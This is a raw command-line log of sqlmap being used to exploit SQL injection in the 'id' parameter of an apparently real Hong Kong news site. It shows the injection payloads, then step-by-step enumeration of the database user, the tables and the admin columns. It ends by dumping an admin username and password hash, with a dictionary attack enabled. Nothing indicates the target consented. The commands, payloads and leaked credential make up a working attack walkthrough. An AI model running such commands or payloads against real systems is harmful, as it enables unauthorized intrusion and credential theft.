D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user    /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db    /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"    /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0    /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0    /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>